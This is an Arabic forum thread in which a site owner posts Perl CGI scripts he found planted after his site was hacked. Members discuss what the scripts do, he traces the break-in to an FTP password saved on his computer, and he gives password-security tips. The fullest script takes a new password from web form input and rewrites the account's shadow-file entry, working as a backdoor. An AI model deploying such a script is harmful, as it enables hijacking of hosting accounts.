الحقو يا اعضاء سوالف يا تلحقو يا ما تلحقو

[awm88]

لقد تم تهكير على موقعي فوجدت هذا


#!/usr/bin/perl

my ($user,$domain) = split(/\@/, $ENV{'REMOTE_USER'});
my $homedir = (getpwuid($>))[7];

if ($ENV{'QUERY_STRING'} ne "") {
@keys = split(/&/, $ENV{'QUERY_STRING'});
foreach $key (sort @keys) {
($name,$value) = split(/=/, $key);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
} else {
read(STDIN,$q,$ENV{'CONTENT_LENGTH'});
@pairs = split(/\&/, $q);
foreach $pair (sort @pairs) {
($name,$value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}



$urlbase = $ARGV[0];
if ($urlbase =~ /\@/) {
$urlbase =~ s/\@/+/g;
$urlbase = "/" . $urlbase;
} else {
$urlbase='';
}


open(RANDOM,"/dev/urandom");
read RANDOM,$random,4096;
close(RANDOM);

$random =~ s/\W//g;

if ($pass eq "*") {
$cpass = "*";
} else {
while ($cpass eq undef or $cpass =~ /:/)
{
$cpass = crypt($FORM{'newpass'},$random);
}
}



open(SHADOW,"$homedir/etc/shadow");
@SHADOW=;
close(SHADOW);
open(SHADOW,">$homedir/etc/shadow");
foreach $line (@SHADOW) {
if ($line =~ /^${user}:/) {
my($user,$pass,$extras) = split(/:/, $line, 3);

مسحت اشويه من الشفرة حتى لا تستغل



يريت الكل يشوف ويش هذا


هذا مو الهم الي وين رايح من المستفيد من هذا

وكل يوم انقول يا جماعه ما يصلح الي يصير بس ما فيه فايدة
طابع الشر شغال
الله كريم

[awm88]

وهذا كمان

#!/usr/bin/perl

$urlbase = $ARGV[0];
if ($urlbase =~ /\@/) {
$urlbase =~ s/\@/+/g;
$urlbase = "/" . $urlbase;
} else {
$urlbase='';
}


print <

[awm88]

#!/usr/bin/perl

my ($user,$domain) = split(/\@/, $ENV{'REMOTE_USER'});
my $homedir = (getpwuid($>))[7];

if ($ENV{'QUERY_STRING'} ne "") {
@keys = split(/&/, $ENV{'QUERY_STRING'});
foreach $key (sort @keys) {
($name,$value) = split(/=/, $key);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
} else {
read(STDIN,$q,$ENV{'CONTENT_LENGTH'});
@pairs = split(/\&/, $q);
foreach $pair (sort @pairs) {
($name,$value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
}



$urlbase = $ARGV[0];
if ($urlbase =~ /\@/) {
$urlbase =~ s/\@/+/g;
$urlbase = "/" . $urlbase;
} else {
$urlbase='';
}


open(RANDOM,"/dev/urandom");
read RANDOM,$random,4096;
close(RANDOM);

$random =~ s/\W//g;

if ($pass eq "*") {
$cpass = "*";
} else {
while ($cpass eq undef or $cpass =~ /:/)
{
$cpass = crypt($FORM{'newpass'},$random);
}
}



open(SHADOW,"$homedir/etc/shadow");
@SHADOW=;
close(SHADOW);
open(SHADOW,">$homedir/etc/shadow");
foreach $line (@SHADOW) {
if ($line =~ /^${user}:/) {
my($user,$pass,$extras) = split(/:/, $line, 3);
print SHADOW "${user}:${cpass}:${extras}";
} else {
print SHADOW $line;
}
}
close(SHADOW);

ازلت اشويه من هنا

وهذا بعد

يا ريت احد يفسر لي ويش صاير

[aoot]

لا اعرف اخى العزيز ولكن اعتقد انها لادراج كلماتك السريه له ولا اعرف كيف وضعها عندك
واعتقد انه غير باسوردك بها

[beshoo]

غريب مع ان كلمات السر تشفر فكيف حصل عليها ولازم يعرف كلمة السر الاولى اي القديمة حتى يغير اللكلمة ؟

كان الله بالعون

[awm88]

السلام عليكم


انا اقول ليكم كيف حصل على الرقم السري الأول
وحتى الكل ياخذ الحذر وينتبه لا يصير فيه مثل الي صار معي
المشكله توجد اكثر من طريقه لختراق الجهاز
و الخطاء الي ارتكتبه يوجد في برنامج ftp خاصية حفظ كلمه السر وانا لم انتبه انه تم حفظ كلمه السر
فتم اختراق الجهاز وعن طريق الكاش للباسوررد تمت سرقه
كلمة السر الأولي وتمت زرع الملفات ولكن اعتقد ان الذي زرع الملفات لا توجد لديه خبرة كفاية في عمليه الأختراق وحتى لا يعلم من اين يدخل على لوحه التحكم لم يستطع ان يغير الرقم السري للموقع
او انه ما سعفه الوقت والسبب اني كنت متواجد في اول عملية المسح واقول يا فرحه ما تمت انا على طول غيرت الرقم السري
هو يفكر انه بغير الرقم السري او انه بعد ما يخرب الموقع يزيل ملفات الخبيثه وكلها على صيغه سي جي اي والحين هي كل الملفات موجودة عندي وانا ما خسرت من الموقع شي بس مجلد الأدمن
في الحلقة القادمه بكون اكثر حرص من كذا وياريت الكل يينتبه الى نفسة

[awm88]

والله ما قصر الدعم الفني عندما اخبرته وانا الحين انتظر اشوف الجواب من الدعم الفني عن كيفيه زرع الملفات cgi
انا موقعي لم اعتمد فيه ملفات cgi اعرف انها خطرها كبير مثل
منفعتها

وانا في انتظار الدعم الفني عشان اشوف هل هذا التوقع هو الصحيح

بس ارجع وقول الي لي زرع الملفات كلها عندي بس خسارة ما عندي
روح شيطانيه مثله او تخريبيه حتى احارب اخوتي وخرب مواقعهم
حتى اشعر با السعادة عندما اخرب مواقع خلق الله
فا اقول الى متى كذا اعقولنا بس تخريبيه وهذا الكلام مو الى الكل
الى الي نفسهم مريضة الله يشافيهم يا رب
انا من مكاني هذا اطلب من رب العالمين انه يشافيهم

[مسالم2002]

السلام عليكم

الصراحه حكاية غريبه ..... !!!!!
والله سلمك من شرهم .... الصراحه لحقت على نفسك في الوقت المناسب

المهم الشيفرات إلي وضعتها تراها مهمه وفيها خطر بالرغم من إنك مسحت بعض منها

فيها بلاوي زرقه وممكن تستغل فياليت تمسحه .....

شي ثاني:
وهو خارج الموضوع كيف يعني بكلامك

انا موقعي لم اعتمد فيه ملفات cgi اعرف انها خطرها كبير مثل منفعتها

وشكرا

[awm88]

السلام عليكم

اشكرك اخوي مسلم 2002 علىالمشاركه

quote:
--------------------------------------------------------------------------------
انا موقعي لم اعتمد فيه ملفات cgi اعرف انها خطرها كبير مثل منفعتها
--------------------------------------------------------------------------------


في الحقيقة توجد في cgi الثغرات الكثير التي يصعب عليي السيطرة عليها و التحكم فيها و على هذا الأساس

أبتعد كل البعد عم ملفات cgi في الموقع فقط php مع انه php
ليست بقوة cgi
بس اتوقع مستوى الأمان في php افضل
----

تحياتي

[awm88]

كيفكم شباب انا راح اجيب اليكم استنتاج خطير بس احد يحدد
الي وين يروح هذي الشفرة يعني الهدف او المستفيد

واكيد بنحصل ثغرة خطير بعد الأستنتاج

[مسالم2002]

مش مذكور في إلي وضعته
كلها تعريفات وتجاوز وحفظ وتغير وقراءة ملفات .... فقط

الاستدعاء الوحيد في هذا السطر
my $homedir = (getpwuid($> ))[7];
بس الى اين الله أعلم ..... هذي ملاحظتي عليه والاسكربت مش كامل علشان اتأكد من كلامي

والباقي مثل ما قلت لك عنه ..... ما أقدر افصح أكثر من كذى


وشكرا

[awm88]

السلام عليكم

اشكر كل من عقب على الموضوع وخصوصاً أخي مسلم 2002

إنا لا اشك إن الكلام الذي سوف أقوله هو أهم نقاط الحماية لكل موقع وكل منتدى لذا أرجو الانتباه لنقاط

التالية. سوف أبداء في النقاط المهمة

1- أول شي أخواني وأحبائي أعضاء سوالف المحترمين يجب عليك الدقة في اختيار كلمة السر

حيث لا تكون فقط أرقام أو حروف وأقول لكم في الأسهل في الاختراق هو إن تكون أرقام فقط حيث يسهل على

كل متعلم إن يخترق الموقع فيسهل على برامج التخمين أيجاد الرقم السري وتكون أسهل من الأحرف

مثل إن يكون الرقم السري 4584758 مثل هذا الرقم يتمكن برنامج التخمين الرقم في مدى لا تتعدى الأسبوع

وربما أيام فقط وحتى لو كانت حروف فقط يستطيع في ضعف المدة التي ستغرقها حتى يجد الرقم السري

حيث يكون على الشكل التالي yhdgtsnk وربما يفكر صاحب الموقع أن يضع مختلط بين الأرقام و الأحرف

فتكون مستوى الصعوبة أكثر ولكن فكر في طريقه أصعب على برنامج التخمين وهي تشكيل الكلمة السرية

مكونة من حروف + أرقام + رموز وفي الحالية يكون على الشكل التالي a~&2hm%7 وتحاول إن تكون

ألكلمه ألسريه طويلة يعني مشكله من أربع خانات وفي نقطة مهم القادمة هي تغيير الرقم السري

بين فترة وفترة يعني لا يترك أكثر من شهر ويفضل أسبوع ولكن يكون مشقة في تغيير الرقم السري

وأعطيكم مثل أو انه إنسان مفكر يخترق موقع يمكن يجلس ستة اشهر يحاول عن طريق برنامج التخمين

يعني يجلس كل يوم خمس ساعات ويفصل ويرجع اليوم الثاني ويكمل حيث إن برنامج التخمين يكمل من

حيث توقف وهكذا حتى يصل إلي الرقم السري

2- لا تحفظ كلمه السر في الجهاز وبحث عن البرامج التي حملتها في المنتدى أو الموقع وخصوصا الملف

المخزن في جهازك config .php من صنف وبحث هل محفوظ بها الرقم السري أو لا يجب حذف الرقم

السري منه ومن كل مكان في الجهاز حتى لو تمكن احد من اختراق الجهاز يكون يبحث عن فراغ يمكن ينفعه

3- لا تفتح أي رسالة من أي شخص مجهول وخصوص المرفقات خذ الحذر من النقطة المهمة ربما تكون

محملة تورجن وتصير من صيد أمس

4- حاول إن تستخدم بريد مجهول لشركه أو للأرقام السرية حيث لا يعلمه احد إلى أنت

يعني بريد خاص جداً ولا تستخدم فيه المسنجر أو أي شي بس فقط استقبال الأرقام السرية

وللحديث بقية